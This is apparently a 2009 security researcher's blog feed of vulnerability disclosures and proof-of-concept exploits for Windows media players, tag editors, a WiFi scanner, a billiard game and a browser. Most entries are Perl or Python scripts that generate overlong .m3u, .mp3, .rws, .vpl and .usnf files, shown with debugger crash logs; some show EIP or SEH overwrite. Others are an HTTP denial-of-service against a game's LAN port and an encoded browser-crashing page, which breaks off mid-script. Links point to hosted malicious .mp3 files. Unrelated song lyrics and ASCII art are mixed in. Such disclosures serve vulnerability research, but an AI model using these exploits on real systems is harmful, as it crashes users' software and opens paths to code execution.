# Product web page: http://www.zortam.com
#
# Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from
# two different malicious files. The first method is thru a .mp3 file which
# has its ID3 tags filled with long strings. The second method is a .m3u list
# which is loaded in to the player resulting in memory corruption of the whole
# application including Dr.Watson crashing along with the app. For 1st method,
# you can click the Search Media for MP3's button and select the folder where
# the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load
# .m3u file into the MP3 Player..boom boom!
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# WinDbg:
#
# [*] overly long id3 tags (.mp3 file):
# ---------------------------------------------------------------------------
#
# (edc.f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864
# eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for [path]\zmmspro.exe -
# zmmspro!ID3_FrameInfo::FieldFlags+0xdce:
# 005788fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
#
# ---------------------------------------------------------------------------
#
#
# [*] long playlist (.m3u file):
# ---------------------------------------------------------------------------
#
# (84.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
# 0:000> g
# (84.b98): Access violation - code c0000005 (!!! second chance !!!)
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01 mov eax,dword ptr [ecx] ds:0023:00000000=????????
#
# ---------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 16.07.2009
#
#



# For first method, use folowing PoC file: #
# #
################################################################
# #
# - 1. http://zeroscience.org/codes/aimp2_evil.mp3 #
# #
# - 2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3 (mirror) #
# #
# - 3. http://securityreason.com/download/11/13 (mirror) #
# #
################################################################
# #
# #


# For second method, use folowing PoC code:
#

$fle = "Kung_PoW.m3u";
$mna = "A" x 800000;
print "\n\n[+] Creating playlist file: $fle ...\r\n";
sleep 1;
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
print m3u "$mna";
close (m3u);
print "\n[+] Playlist file successfully created!\r\n";





http://www.zeroscience.org/codes/zortam_studio.txt

Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Vulnerability

#!/usr/bin/perl
#
# Title: Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Vulnerability
# Product Web Page: http://www.zortam.com
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
#
###===---
#
# (1c0.7f8): Integer divide-by-zero - code c0000094 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0000000d ebx=0019be80 ecx=00000000 edx=00000000 esi=0180f5dc edi=0000000a
# eip=0040f294 esp=0012f588 ebp=0180f570 iopl=0 nv up ei pl nz ac po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210212
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for zPlayer.exe -
# zPlayer+0xf294:
# 0040f294 f7f9 idiv eax,ecx
#
###===---
#
#
# Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.org
# 16.07.2009
#

$fle = "Kung_PoW.m3u";
$mna = "A" x 800000;
print "\n\n[+] Creating playlist file: $fle ...\r\n";
sleep 1;
open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
print m3u "$mna";
close (m3u);
print "\n[+] Playlist file successfully created!\r\n";





http://www.zeroscience.org/codes/zortam_zero.txt

Zortam ID3 Tag Editor 5.0 (mp3 file) Remote Stack Overflow Vulnerability

###################################################################################

Title: Zortam ID3 Tag Editor 5.0 (mp3 file) Remote Stack Overflow Vulnerability

Product Web Page: http://www.zortam.com/

Tested On: Microsoft Windows XP Professional SP3 (English)

Desc: Just download the PoC, and search for media or navigate with the vuln program
in the folder where the evil .mp3 file is located...boom.

Vulnerability Discovered by Gjoko 'LiquidWorm' Krstic

liquidworm gmail com

Zero Science Lab (c) 2009
Macedonian Security Research & Development Laboratory
http://www.zeroscience.org/

16.07.2009

###################################################################################
1. PoC: http://zeroscience.org/codes/aimp2_evil.mp3
2. PoC: http://milw0rm.com/sploits/2009-aimp2_evil.mp3
3. PoC: http://securityreason.com/download/11/13
###################################################################################

###################################################################################


http://www.zeroscience.org/codes/zortam_bof.txt

14 July, 2009

Music Tag Editor 1.61 build 212 Remote Buffer Overflow PoC

==

* Music Tag Editor 1.61 build 212 Remote Buffer Overflow PoC *

Product: http://www.assistanttools.com/products/tag_editors/music_tag_editor/index.shtml
Tested On Microsoft Windows XP Professional SP3 (English)

Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.org/
15.07.2009

==

(8bc.86c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410041 ebx=00000000 ecx=0010fa80 edx=00410041 esi=001e5fb0 edi=000fd060
eip=cccccccc esp=000fcfa0 ebp=000fcff8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
cccccccc ??

==

*** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3
http://milw0rm.com/sploits/2009-aimp2_evil.mp3

** Note: The same PoC used in:
- http://secunia.com/advisories/35305/
- http://secunia.com/advisories/35295/

EOF





http://www.zeroscience.org/codes.html

Prep for Lazzz

09 July, 2009

Photoshop Session No.6







http://liquidworm.deviantart.com


Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability



#!/usr/bin/python
#
#
# * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#
#
# * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices.
# * Vendor: eEye Digital Security Inc.
# * Product Web Page: http://www.eeye.com/
# * Current Version: 1.0.8.68
# * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package.
# * Tested On Microsoft Windows XP Professional SP3 (English)
#
# * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# * liquidworm gmail com
# * http://www.zeroscience.org
# * 16.05.2009
#
# * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
#
#
# * --------------------------------windbg---------------------------------- *
#
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
# eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** Defaulted to export symbols for [path]\WiFiCore.dll -
# WiFiCore!LibWifi_ReportHTML+0x1b48e:
# 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=??
# 0:000> g
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
# eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# *** Defaulted to export symbols for [path]\kernel32.dll -
# kernel32!IsBadReadPtr+0x39:
# 7c809eda 8a02 mov al,byte ptr [edx] ds:0023:41414141=??
#
# * -------------------------------/windbg---------------------------------- *
#
#
# * Disclosure Timeline:
#
# * [16.05.2009] Vulnerability discovered.
# * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof
# of concept code.
# * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply
# from previous e-mail.
# * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in
# progress.
# * [25.05.2009] Vendor contacted for information on patch development and its release process
# because of our advisory disclosure policy.
# * [29.05.2009] Vendor contacted again for information on patch development because of no reply
# from previous e-mail.
# * [29.05.2009] Vendor answered. Bug fixes scheduled within next week.
# * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix
# time line information.
# * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed
# the QA. The fix will be introduced in the next release of the product. Scheduled
# date for the release of the update is not yet known...or...it's unknown :).
# * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release
# of the Retina package approximately on 29th of June.
# * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release.
# * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program
# * fixes. Vendor will contact me after the tests, with the results from the same.
# * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published
# * on 10th of july because of internal company reasons.
# * [09.07.2009] No reply from the vendor.
# * [10.07.2009] Public advisory released.
#
#
#
# * Pozdrav Do:
#
# * sm, thricer, drowsy, Jayji, Leon Juranic,
# * teppei, n3tpr0b3, DrunkY, apo, Aodrulez,
# * kokanin, e.wiZz!, j0rgan, str0ke, Uploader,
# * Jonathan Salwan, Sergio 'shadown' Alvarez,
# * Malformation, dz0, d3, Greg Linares, lio,
# * mio, drown, dni, Damjan, Maximiliano Soler,
# * leetgeek, Preddy, Gliser, eSDee i t.d. :)
#
#
# * Proof Of Concept:
#


#=========================================*snip*=========================================#


header = (
"\x52\x57\x53"
"\x30\x31\x30"
"\x19\x52\x76"
"\x00"
)

buffer = "\x41" * 1574624 #[Bytes/chars]
#1574622 No issues
#1574623 BoF, Access violation when reading [random]
#1574624 BoF, Access violation when reading [414141B1]
#...

payload = header + buffer

file = "Abulia.rws"

filetzio=open(file,'w')
filetzio.write(payload)
filetzio.close()

print "\n[+] File " + file + " successfully landed.\n"


#=========================================*snip*=========================================#




#################################################################################
# #
# * Disclaimer: #
# #
# * This document and all the information it contains are provided "as is", #
# * for educational purposes only, without warranty of any kind, whether #
# * express or implied. #
# #
# * The author reserves the right not to be responsible for the topicality, #
# * correctness, completeness or quality of the information provided in #
# * this document. Liability claims regarding damage caused by the use of #
# * any information provided, including any kind of information which is #
# * incomplete or incorrect, will therefore be rejected. #
# #
#################################################################################







http://zeroscience.org/codes/retinawifi_bof.txt
http://research.eeye.com/html/advisories/published/AD20090710.html

t00t!

08 July, 2009

The End of milw0rm.com

7th of July, 2009...str0ke stated:

"Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past. Be safe, /str0ke"

Thanks milw0rm.com for years given to the community.

15 June, 2009

Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability

#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
#
# Summary: Carom 3D is an online multi-user billiard game created with special
# 3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
# ball and other Billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world famous korean game Carom3D suffers from a buffer overflow
# and a denial of service vulnerability. The BoF is triggered at
# runtime when we append 218 > bytes as an argument. ~1000 bytes
# overwrites SEH. The denial of service is triggered when a user
# creates a LAN Game (cred. needed), creates a room and awaits
# other players to join the game. While awaiting (listening on port
# 28012), with a simple HTTP GET/POST, an attacker can lockdown
# the GUI of the user created the room, not alowing to start or
# even exit the game's GUI, unless forced quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#

# ----------------------------------DoS---------------------------------- #

use LWP::Simple;

my $url = 'http://192.168.1.3:28012';
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;

# You can Ctrl+C, the lockdown is ON.

# ---------------------------------/DoS---------------------------------- #





###########################################################################





# ----------------------------------BoF---------------------------------- #

# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.

system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

# ---------------------------------/BoF---------------------------------- #








http://zeroscience.org/codes/carom3d.txt

31 May, 2009

Mp3 Tag Assistant Pro 2.92 (tag metadata) Remote Stack Overflow PoC

################################################################################

### Title: Mp3 Tag Assistant Pro 2.92 (tag metadata) Remote Stack Overflow PoC

### Summary: MP3 Tag Assistant Professional 2.92 is a professional-level audio
tag editor with UNICODE support.

### Product web page: http://www.assistanttools.com/

### Desc: MP3 Tag Assistant Professional 2.92 is vulnerable to a stack buffer
overflow attack when loading a malicious mp3 file (or file that supports
tags) filled with overly long A's in its metadata (id3v1, id3v2 apev2,
etc.). To succesfully exploit this issue you have to change the hex
values of the file and remove the null bytes in the metadata header.
I'm being lazy this season..... so.... ;). You can take any mp3 file,
edit its metadata with some mp3 tag editor (ironic, isen't it..) and
fill every field with long string of bytes.

* I think that this issue is affecting many softwares out there that
deals with playing mp3 files or any other file that supports tags
metadata. So knock your socks off.....t00t w00t.

This is the same PoC as: http://zeroscience.org/codes/aimp2_poc.txt

So I'll use the same mp3 file (aimp2_evil.mp3) which is a song by
Gary Jules - Mad World, and it's approximately 2.92 megabytes.

Proof of Concept: http://www.zeroscience.org/codes/aimp2_evil.mp3

### Tested on Microsoft Windows XP Professional SP3 (English)

### WinDbg log:


---------------------------------------------------------------------------------

(c5c.eb0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001093d4 ebx=00000000 ecx=00bc7f7c edx=00bc7f7c esi=0010a658 edi=00109414
eip=00410056 esp=00109418 ebp=00410041 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010282
*** WARNING: Unable to verify checksum for [path]\Mp3 Tag Assistant Pro.exe
*** ERROR: Module load completed but symbols could not be loaded for [path]\Mp3 Tag Assistant Pro.exe
Mp3_Tag_Assistant_Pro+0x10056:
00410056 008b45085068 add byte ptr [ebx+68500845h],cl ds:0023:68500845=??
0:000> g
(c5c.eb0): Access violation - code c0000005 (!!! second chance !!!)
eax=001093d4 ebx=00000000 ecx=00bc7f7c edx=00bc7f7c esi=0010a658 edi=00109414
eip=00410056 esp=00109418 ebp=00410041 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000282
Mp3_Tag_Assistant_Pro+0x10056:
00410056 008b45085068 add byte ptr [ebx+68500845h],cl ds:0023:68500845=??

---------------------------------------------------------------------------------


### OllyDbg log: http://img241.imageshack.us/img241/6766/mp3tagolly.jpg


### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

### liquidworm gmail com

### http://www.zeroscience.org/

### 31.05.2009

################################################################################


http://zeroscience.org/codes/mp3tag_bof.txt


29 May, 2009

AIMP 2.51 build 330 (ID3v1/ID3v2 Tag) Remote Stack Buffer Overflow PoC (SEH)


_______________________________________________________
| |
/ | * AIMP 2.51 build 330 (ID3v1/ID3v2 Tag) * |
/---, | * Remote Stack Buffer Overflow PoC (SEH) * |
-----# ==| | |
| :) # ==| |......................................................|
-----'----# | |______________________________________________________|
|)___() '# |______====____ \___________________________________|
[_/,-,\"--"------ //,-, ,-,\\\ |/ //,-, ,-, ,-,\\ __#
( 0 )|===******||( 0 )( 0 )||- o '( 0 )( 0 )( 0 )||
----'-'--------------'-'--'-'-----------------------'-'--'-'--'-'---------------
################################################################################


*** Summary: Freeware audio player

*** Product web page: http://www.aimp.ru/

*** Desc: AIMP version 2.51 build 330 suffers from a stack based buffer overflow
vulnerability that can be exploited via malicious media file that
supports ID3 tags (mp3). EIP and ECX registers gets overwritten,
including the SE handler and the pointer to the next SEH record. The
issue is trigered by viewing the file's metadata or by pressing the
F4 key and selecting the ID3v1 or ID3v2 tab.

*** Tested on Microsoft Windows XP Professional SP3 (English)

*** Windbg log:

--------------------------------------------------------------------------------

(f3c.850): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012d770 ebp=0012d790 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x14141:
41414141 0000 add byte ptr [eax],al ds:0023:00000000=??

--------------------------------------------------------------------------------


*** Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

*** liquidworm gmail com

*** http://www.zeroscience.org/

*** 29.05.2009


################################################################################

>>> *** PoC: http://milw0rm.com/sploits/2009-aimp2_poc.mp3.rar.w00t ~1.32 MB <<< ################################################################################ 'SHPA !!! ########### . . .n . . n. . .dP dP 9b 9b. . 4 qXb . dX Xb . dXp t dX. 9Xb .dXb __ __ dXb. dXP .Xb 9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP `9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP' `9XXXXXXXXXXXP' `9XX' Yo! `98v8P' Thricer `XXP' `9XXXXXXXXXXXP' ~~~~~~~ 9X. .db|db. .XP ~~~~~~~ )b. .dbo.dP'`v'`9b.odb. .dX( ,dXXXXXXXXXXXb dXXXXXXXXXXXb. dXXXXXXXXXXXP' . `9XXXXXXXXXXXb dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb 9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP `' 9XXXXXX( )XXXXXXP `' XXXX X.`v'.X XXXX XP^X'`b d'`X^XX X. 9 ` ' P )X `b ` ' d' ` '




http://zeroscience.org/codes/aimp2_poc.txt

PoC: http://www.zeroscience.org/codes/aimp2_evil.mp3

07 May, 2009

ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC

--------------------------------------------------
#/usr/bin/perl
#
# ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009

$b= "[General]\r\n".
"Title=Proof of Concept\r\n".
"Author=LiquidWorm\r\n".
"Comments=2009\r\n".
"Version=1.0\r\n".
"[Files]\r\n";
"Count=800000\r\n".
"LastPlayed=0\r\n";
$c= "1=" . "A" x 800000 . "\r\n";
open a, ">./lqwrm.vpl";
print a $b.$c;
close a;
print "\n- Done!\n";
--------------------------------------------------





http://zeroscience.org/codes/viplay_poc.txt

20 April, 2009

Dion And The Belmonts - Runaround sue





Here's my story, sad but true
It's about a girl that I once knew
She took my love then ran around
With every single guy in town
Ah, I should have known it from the very start
This girl will leave me with a broken heart
Now listen people what I'm telling you
A-keep away from-a Runaround Sue

I miss her lips and the smile on her face
The touch of her hair and this girl's warm embrace
So if you don't wanna cry like I do
A-keep away from-a Runaround Sue

Ah, she likes to travel around
She'll love you but she'll put you down
Now people let me put you wise
Sue goes out with other guys
Here's the moral and the story from the guy who knows
I fell in love and my love still grows
Ask any fool that she ever knew, they'll say
Keep away from-a Runaround Sue

She likes to travel around
She'll love you but she'll put you down
Now people let me put you wise
Sue goes out with other guys
Here's the moral and the story from the guy who knows
I fell in love and my love still grows
Ask any fool that she ever knew, they'll say
Keep away from-a Runaround Sue

05 April, 2009

Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC

#!/usr/bin/perl
#
# Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
#
# Summary: Dont just look at hex dumps and protocol trees. With Unsniff
# Network Analyzer, you can view network traffic at various levels of detail.
# View high level objects like images, video, HTML pages, VOIP calls, drill
# down to individual TCP sessions, then onto reassembled PDUs, then finally
# to individual packets. All this functionality is packed in a cool graphical
# interface.
#
# Product web page: http://www.unleashnetworks.com/unsniff/unsniff-2.html
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
# ----------------------------windbg outpootz-------------------------------
#
# HEAP[usnfctr.exe]: Invalid allocation size - 88888880 (exceeded 7ffdefff)
# (998.d08): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=22222220 edx=00000000 esi=01248c58 edi=00000000
# eip=018468d1 esp=0012c754 ebp=0012c7dc iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
# vocore2u!CatFactory_SysLASwizzle+0x24602:
# 018468d1 f3ab rep stos dword ptr es:[edi]
# Missing image name, possible paged-out or corrupt data.
#
# --------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 06.04.2009
#





$a="\x01\x00\x00\x00\x11".
"\x27\x00\x00\x56\x00\x4F\x00\x44".
"\x00\x41". "\x00". "\x54\x00".
"\x42\x00". "\x53". "\x00\x31".
"\x00". "\x00". "\x00". "\x00". "\x00".
"\x00\x00". "\x00". "\x00\x00".
"\x00\x00". "\x00". "\x00\x00".
"\x00\x00". "\x00\x00". "\x00\x00".
"\x00\x20". "\x00". "\x00". "\x00\x10".
"\x00\x00". "\x00". "\x40". "\x00\x00".
"\x00\x40\x04". "\x00\x02\x00".
"\x40\x00";$b="\x4A"x300000;$c="\0x0D".
"\0x0A"x10;$d="\x90"x20;$e="\x00".
"\x00".
#############
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x2C\x24\x00\x00\x2A\x24".
"\x00\x00". "\x29\x24\x00\x00\x27\x24". "\x00\x00".
"\x26\x24". "\x00\x00\x24\x24\x00\x00". "\x23\x24".
"\x00\x00". "\x21\x24\x00\x00\x20\x24". "\x00\x00".
"\x1E\x24". "\x00\x00\x1D\x24\x00\x00". "\x1B\x24".
"\x00\x00". "\x1A\x24\x00\x00\x18\x24". "\x00\x00".
"\x17\x24". "\x00\x00\x15\x24\x00\x00". "\x14\x24".
"\x00\x00". "\x12\x24\x00\x00\x11\x24". "\x00\x00".
"\x0F\x24". "\x00\x00\x0E\x24\x00\x00". "\x0C\x24".
"\x00\x00". "\x0B\x24\x00\x00\x09\x24". "\x00\x00".
"\x08\x24". "\x00\x00\x06\x24\x00\x00". "\x05\x24".
"\x00\x00". "\x03\x24\x00\x00\x02\x24". "\x00\x00".
"\x00\x24\x00\x00\xFF\x23".
"\x00\x00\xFD\x23\x00\x00".
"\xFC\x23\x00\x00\xFA\x23".
"\x00\x00\xF9\x23\x00\x00".
"\xF7\x23\x00\x00\xF6\x23\x00\x00".
"\xF4\x23\x00\x00\xF3\x23\x00\x00\xF1\x23".
"\x00\x00\xF0\x23\x00\x00\xEE\x23\x00".
"\x00\xED\x23\x00\x00";
$file="Denny_Crane.usnf";
open j, ">./$file";
###########################
###################
#-#-#-##-#-#-#
#t00t#

print j $a.$b.$c.$d.$b.$c.$d.$e;
close j;sleep 1;print "\nYeah.\n";
print "File $file successfully landed!\n";



http://www.zeroscience.org/codes/unsniff_heap.txt
http://www.milw0rm.com/exploits/8360

31 March, 2009

QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)

###################################################################################
#
# QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)
#
# Summary: QtWeb is compact, portable and secure web browser having some unique UI
# and privacy features. QtWeb is an open source project based on Nokia's Qt framework
# (former Trolltech) and Apple's WebKit rendering engine (the same as being used in
# Apple Safari and Google Chrome).
#
# Happy Exploit.
#
# Product web page: http://www.qtweb.net/
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 01.04.2009
#
###################################################################################

$S="\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A".
"\x3C\x74\x69\x74\x6C\x65\x3E\x51\x74\x57\x65\x62".
"\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x42\x72\x6F\x77\x73\x65".
"\x72\x20\x32". "\x2E\x30\x20".
"\x28\x62". "\x75\x69".
"\x6C\x64". "\x20\x30".
"\x34\x33". "\x29\x20".
"\x52\x65". "\x6D\x6F".
"\x74\x65". "\x20\x44".
"\x65\x6E". "\x69\x61".
"\x6C\x20". "\x6F\x66".
"\x20\x53". "\x65\x72".
"\x76\x69". "\x63\x65".
"\x20\x45". "\x78\x70".
"\x6C\x6F". "\x69\x74". "\x3C\x2F". "\x54\x69".
"\x74\x6C". "\x65". "\x3E". "\x0D". "\x0A". "\x3C\x68".
"\x65\x61". "\x64". "\x3E". "\x3C". "\x62". "\x6F\x64".
"\x79\x3E". "\x3C". "\x73". "\x63". "\x72". "\x69\x70".
"\x74\x20". "\x74\x79".
"\x70\x65". "\x3D\x22".
"\x74\x65". "\x78\x74".
"\x2F\x6A". "\x61\x76".
"\x61\x73". "\x63\x72".
"\x69\x70". "\x74\x22".
"\x3E\x0D". "\x0A\x61".
"\x6C\x65". "\x72\x74".
"\x28\x22". "\x51\x74".
"\x57\x65". "\x62\x20".
"\x49\x6E". "\x74\x65".
"\x72\x6E". "\x65\x74".
"\x20\x42". "\x72\x6F".
"\x77\x73". "\x65\x72".
"\x20\x32". "\x2E\x30".
"\x20\x28". "\x62". "\x75". "\x69\x6C".
"\x64\x20". "\x30". "\x34". "\x33\x29".
"\x20\x52". "\x65". "\x6D". "\x6F\x74".
"\x65\x20". "\x44". "\x65". "\x6E\x69".
"\x61\x6C". "\x20". "\x6F". "\x66\x20".
"\x53\x65". "\x72". "\x76". "\x69\x63".
"\x65\x20". "\x45". "\x78". "\x70\x6C".
"\x6F\x69". "\x74". "\x5C". "\x6E\x5C".
"\x6E\x5C". "\x74". "\x5C". "\x74\x5C".
"\x74\x62". "\x79". "\x20". "\x4C\x69".
"\x71\x75". "\x69". "\x64". "\x57\x6F".
"\x72\x6D". "\x20". "\x28". "\x63\x29".
"\x20\x32". "\x30". "\x30". "\x39\x22".
"\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
"\x63\x74". "\x69\x6F".
"\x6E\x20". "\x64\x6F".
"\x7A\x28". "\x29\x20".
"\x7B\x0D". "\x0A\x74".
"\x69\x74". "\x6C\x65".
"\x3D\x22". "\x48\x6F".
"\x74\x20". "\x49\x63".
"\x65\x22". "\x3B\x0D".
"\x0A\x75". "\x72\x6C".
"\x3D\x22". "\x68\x74".
"\x74\x70\x3A". "\x2F\x2F\x77".
"\x77\x77\x2E\x6D\x69\x6C\x77\x30\x72\x6D\x2E\x63\x6F\x6D\x2F".
"\x22\x3B\x0D\x0A\x69\x66\x20\x28\x77\x69\x6E\x64".
"\x6F\x77\x2E\x73\x69\x64\x65\x62";$M=




"\x61". "\x72" ."\x29". "\x20".
"\x7B". "\x0D" ."\x0A". "\x77". "\x69".
"\x6E"."\x64". "\x6F". "\x77". "\x2E".
"\x73". "\x69". "\x64". "\x65".
"\x62". "\x61". "\x72". "\x2E".
"\x61". "\x64". "\x64". "\x50".
"\x61". "\x6E". "\x65". "\x6C".
"\x28". "\x74". "\x69". "\x74".
"\x6C". "\x65". "\x2C". "\x20".
"\x75". "\x72". "\x6C". "\x2C".
"\x22". "\x22". "\x29". "\x3B".
"\x0D". "\x0A"."\x7D".
"\x20". "\x65". "\x6C".
"\x73";




$I="\x65\x20\x69\x66\x28\x20\x77".
"\x69\x6E\x64\x6F\x77".
"\x2E\x65\x78\x74\x65\x72\x6E".
"\x61\x6C\x20\x29\x20". ##############
"\x7B\x0D\x0A\x77\x69\x6E\x64". ## #
"\x6F\x77\x2E\x65"."\x78". ######
"\x74\x65\x72\x6E\x61". ########## _ _ _
"\x6C\x2E\x41\x64\x64\x46\x61\x76\x6F\x72\x69". #==---- #==---- #==----
"\x74\x65\x28\x20\x75".
"\x72\x6C\x2C\x20\x74". ##===*
